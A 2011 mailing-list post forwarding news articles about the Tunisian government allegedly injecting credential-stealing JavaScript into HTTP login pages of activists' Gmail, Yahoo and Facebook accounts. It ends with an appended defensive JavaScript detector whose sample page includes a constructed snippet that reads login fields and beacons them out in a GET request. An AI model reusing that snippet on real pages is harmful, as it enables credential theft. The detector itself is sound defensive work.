[liberationtech] Tunisian government hacks into gmail and Facebook accounts

Daniel Colascione dan.colascione at gmail.com
Wed Jan 12 16:59:18 PST 2011


This story makes me livid. In this age of inexpensive CPU cycles and fast networks, a company like Facebook has no excuse for not protecting its users with cryptography. If you want to talk about corporate responsibility, *this* is where we start.

On Jan 12, 2011 4:33 PM, Terry Winograd <winograd at cs.stanford.edu> wrote: 

http://www.fastcompany.com/1715575/tunisian-government-hacking-facebook-gmail-anonymous



Tunisian Government Allegedly Hacking Facebook, Gmail Accounts of Dissidents and Journalists

By Neal Ungerleider, Mon Jan 10, 2011



> A strange bit of JavaScript has found its way onto Tunisian Internet users' internet login screens. Some are now in jail in a country known for torture. But they've been adopted by an unlikely ally: Anonymous.



Massive riots and protests have rocked Tunisia this past month. After a 26-year-old street vendor named Mohammed Bouazizi attempted to kill himself by self-immolation (he survived and later died of his burns), hundreds of thousands took to the North African nation's streets. The protesters complain of unemployment, economic woes, and an omnipresent dictatorship. Tunisia's government has stumbled upon a new method of combating the protesters: hacking into their social media accounts.

According to a report by the Committee to Protect Journalists, the Tunisian government appears to be breaking into the Facebook, Google, and Yahoo accounts of dissidents and journalists. Hackers with unusual levels of access to Tunisia's state-control network infrastructure have managed to gain access to Facebook accounts belonging to individuals such as journalists Sofiene Chourabi of al-Tariq al-Jadid (New Path; a newspaper affiliated with the opposition Movement Ettajdid party) and independent video journalist Haythem El Mekki, while gaining the passwords of others. Hack targets found that Facebook groups they founded were deleted, as were pictures of protests. In CPJ's words, “Their accounts and pictures of recent protests have been deleted or otherwise compromised.” Blogs hosted on Blogspot and elsewhere are also being targeted. Here is an excerpt from a post by Lina Ben Mhenni of the A Tunisian Girl blog:



> Well, I can understand ... No I can't understand that some stupid person has hacked my e-mail then, my Facebook account. This stupid person has also deleted some pages in which I am an administrator. Pages like that of 7ellblog (launch a blog) which has been largely promoted even by official media, the page of the Tunisian singer Amel Mathlouthi, Reading Books is Better than Staring at others (yes they hate reading and culture in my country), the Tunisian blogosphere, and maybe a page against censorship 'la censure nuit à l'image de mon pays' (I don't have the confirmation yet) and many other pages were deleted. What happened is so shameful because the internet police is again confirming its stupidity and useless stubbornness. Sofiene Chourabi and Azyz Amami are experiencing the same problem now. They have been hacked.



Already, in-depth information is surfacing on how the hacks were committed. It appears that the Agence tunisienne d'Internet, a government agency which supervises all of Tunisia's ISPs, or someone with access to the agency committed them. Tunisian ISPs are running a JavaScript that siphons off login credentials from users of Facebook, Yahoo and Gmail. According to the Tech Herald's Steve Ragan:



> Daniel Crowley, Technical Specialist for Core Security, and Rapid7’s Josh Abraham, broke the code down further. Crowley explained that the JavaScript is customized for each site’s login form. It will pull the username and password, and encode it with a weak crypto algorithm. The newly encrypted data is placed into the URL, and a randomly generated five character key is added. The randomly generated key is meaningless, but it is assumed that it’s there to add a false sense of legitimacy to the URL. The random characters and encrypted user information are delivered in the form of a GET request to a non working URL.



The code only targeted users accessing HTTP sites instead of HTTPS, which appears to be why Facebook was so heavily ravaged by the hack plan. Facebook users default to using HTTP to access the site.

Much of this information has been released to the public by the quasi-4Chan allied Anonymous group, which has launched an anti-Tunisian government hacker campaign called Operation: Tunisia.

Amamou was taken into police custody this past week after authorities apparently found his location via Foursquare. His current whereabouts are unknown.



The Agence tunisienne d'Internet has long been one of the most censorship-happy government agencies in all of Africa. Tunisia's net firewalls and intricate IP tracking mechanisms have been compared to China's, while popular sites like YouTube and DailyMotion were banned due to hosting videos alleging human rights abuses in Tunisian prisons. In one of the WikiLeaks cables on Tunisia, an anonymous diplomat notes endemic government corruption and refers to the government of President-for-life Zine al-Abidine Ben Ali as a “quasi-mafia” and a police state.

While Facebook, Google and Yahoo have not spoken publicly on the alleged Tunisian government hacking campaign yet, the State Department has. In a press conference on Friday, January 7, spokesperson Philip Crowley stated:



> We are concerned about recent reports that Tunisian ISP providers, at the direction of the government, hacked into the accounts of Tunisian users of American companies including Facebook, and providers of email such as Yahoo and Google, and stealing passwords. This kind of interference threatens the ability of civil society to realize the benefits of new technologies. Cyber intrusions of all kinds, including reported attacks on government of Tunisia websites, disrupt the free flow of information and reduce overall confidence in the reliability and security of vital information networks.



During the past week, in addition to Amamou, at least three other members of Tunisia's hacker and blogger communities were taken into custody by Tunisian police.





----------------------------------

http://www.thetechherald.com/article.php/201101/6651/Tunisian-government-harvesting-usernames-and-passwords

Tunisian government harvesting usernames and passwords
by Steve Ragan - Jan 4 2011, 20:08





The Tunisian Internet Agency (Agence tunisienne d'Internet or ATI) is being blamed for the presence of injected JavaScript that captures usernames and passwords. The code has been discovered on login pages for Gmail, Yahoo, and Facebook, and said to be the reason for the recent rash of account hijackings reported by Tunisian protesters.

ATI is run by the Tunisian Ministry of Communications. They supply all of the privately held Tunisian ISPs, making them the main source of Internet access in the country. They’ve been under scrutiny for years, due to the fact that they make use of their authority to regulate the entire national network. Last April, ATI earned international attention by blocking access to sites such as Flickr, YouTube, and Vimeo.

According to Reporters Without Borders, authorities claim to target only pornographic or terrorist websites. “However, censorship applies above all to political opposition, independent news, and human rights websites.”

“When an Internet user attempts to access a prohibited website, the following automatic error message appears: “Error 404: page not found,” without displaying the familiar “Error 403” more typical of a blocked site... This strategy equates to a disguised form of censorship.”

As for the JavaScript itself, The Tech Herald has seen examples of the embedded script during live surfing sessions with sources in Tunisia, and in posted source code made available to the Web. The source for the GMail injection is here, the Yahoo injection is here, and Facebook is here.

Four different experts consulted by The Tech Herald independently confirmed our thoughts; the embedded code is siphoning off login credentials.

On Twitter, security researcher Gerry Kavanagh and Errata Security CTO David Maynor told us that you can tell the code is capturing login information by how it references the login element for the form.

“Suffice to say, the code is definitely doing something surreptitious,” Kavanagh noted.



Daniel Crowley, Technical Specialist for Core Security, and Rapid7’s Josh Abraham, broke the code down further. Crowley explained that the JavaScript is customized for each site’s login form. It will pull the username and password, and encode it with a weak crypto algorithm.

The newly encrypted data is placed into the URL, and a randomly generated five character key is added. The randomly generated key is meaningless, but it is assumed that it’s there to add a false sense of legitimacy to the URL.

The random characters and encrypted user information are delivered in the form of a GET request to a non working URL. In the Gmail example, you see this URL listed as http://www.google.com/wo0dh3ad. Abraham noted that the encryption makes it easy to capture usernames and passwords that would include special characters such as ‘%’ or ‘/’.

Considering that the backbone of the Tunisian Internet is full of state run filters and firewalls designed to block access, configuring one to log the GET commands with the harvested data would be trivial. But is this a government sponsored action?



The likelihood that a group of criminals compromised the entire Tunisian infrastructure is virtually nonexistent. Code planting on this scale could only originate from an ISP. With their history of holding an iron grip on the Internet, ATI is the logical source of the information harvesting.



There is an upside however, as the embedded JavaScript only appears when one of the sites is accessed with HTTP instead of HTTPS. In each test case, we were able to confirm that Gmail and Yahoo were only compromised when HTTP was used. For Facebook on the other hand, the default access is HTTP, so users in Tunisia will need to visit the HTTPS address manually.



Another interesting note is that it appears the embedded code has targeted Tunisian users for several months. Slim Amamou, of the Global Voices Advocacy blog, reported his findings on the code last July, and at the time, ATI was blocking Google’s HTTPS port, forcing users to default to HTTP.

The information surrounding the embedded JavaScript came to our attention thanks to a user on the IRC server where supporters for Anonymous’ Operation: Tunisia gathered to show support for Tunisian protesters. When word spread of embedded code and account hijackings, Anonymous offered Tunisian users help via Userscripts.org, with a browser add-on that strips the added JavaScript code.

The ATI website has been offline for more than a day. The outage started after Anonymous launched Operation: Tunisia. Our coverage on their actions and the problems in Tunisia is here.
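The per-form credential capture and same-host beacon URL described in the two articles above, looked at from the defender's side as an added example (this is not code from the articles, from the injected ATI script, or from the Anonymous add-on): a heuristic that flags an inline script on an HTTP-served login page only when it both reads the credential fields and writes them into an outbound URL, and strips such scripts the way the Userscripts.org add-on is said to have done. The field ids Email/Passwd, the sample page and the `k=` suffix are constructed assumptions; the wo0dh3ad path is the one the Tech Herald quotes.

```javascript
// Added example, not the article's, ATI's or the add-on's code: flag an
// inline script that reads credential fields AND writes them into a URL
// the browser will fetch (the data flow the article describes), and strip it.
const CREDENTIAL_FIELDS = ["Email", "Passwd"];   // assumed Gmail-style field ids
const EXFIL_SINKS = [/\.src\s*=/, /location(?:\.href)?\s*=/,      // img/iframe src, redirect
                     /\.open\s*\(\s*["']GET["']/, /document\.write\s*\(/];  // XHR, injected tag
const SCRIPT_RE = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;

function analyzeScript(code, pageHost) {
  const fields = CREDENTIAL_FIELDS.filter((f) =>
    new RegExp(`(?:getElementById|getElementsByName)\\(\\s*["']${f}["']\\s*\\)`).test(code));
  const url = code.match(/https?:\/\/([^/"'\s]+)[^"'\s]*/);
  const hasSink = EXFIL_SINKS.some((re) => re.test(code));
  if (fields.length === 0 || !hasSink || !url) return null;   // benign
  return {
    fields,
    url: url[0],
    // The Gmail beacon used the site's own host (www.google.com/wo0dh3ad), so a
    // host allow-list alone misses it; the field-to-URL flow is the real tell.
    sameHost: url[1].toLowerCase() === pageHost.toLowerCase(),
  };
}

function scanLoginPage(html, pageHost) {
  const findings = [];
  for (const m of html.matchAll(SCRIPT_RE)) {
    if (/\bsrc\s*=/i.test(m[1])) continue;   // external scripts: out of scope here
    const finding = analyzeScript(m[2], pageHost);
    if (finding) findings.push(finding);
  }
  return findings;
}

// Remove flagged inline scripts, leaving benign ones untouched.
function stripFlaggedScripts(html, pageHost) {
  return html.replace(SCRIPT_RE, (whole, attrs, body) =>
    !/\bsrc\s*=/i.test(attrs) && analyzeScript(body, pageHost) ? "" : whole);
}

// Constructed sample page: a benign inline script plus one modelled on the
// described injection (reads both fields, beacons them in an image GET).
const SAMPLE_HTML = `<form><input id="Email"><input id="Passwd" type="password"></form>
<script>document.getElementById("Email").focus();</script>
<script>var u=document.getElementById("Email").value,p=document.getElementById("Passwd").value;
(new Image()).src="http://www.google.com/wo0dh3ad?"+enc(u+"|"+p)+"&k=x7q2m";</script>`;

console.log(scanLoginPage(SAMPLE_HTML, "www.google.com"));
```

The heuristic is deliberately narrow: a script that merely focuses a field, or one that builds a URL without touching the credential fields, is left alone, while the page itself being fetched over HTTPS remains the actual mitigation both articles point to.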



--
_______________________________________________
liberationtech mailing list
liberationtech at lists.stanford.edu
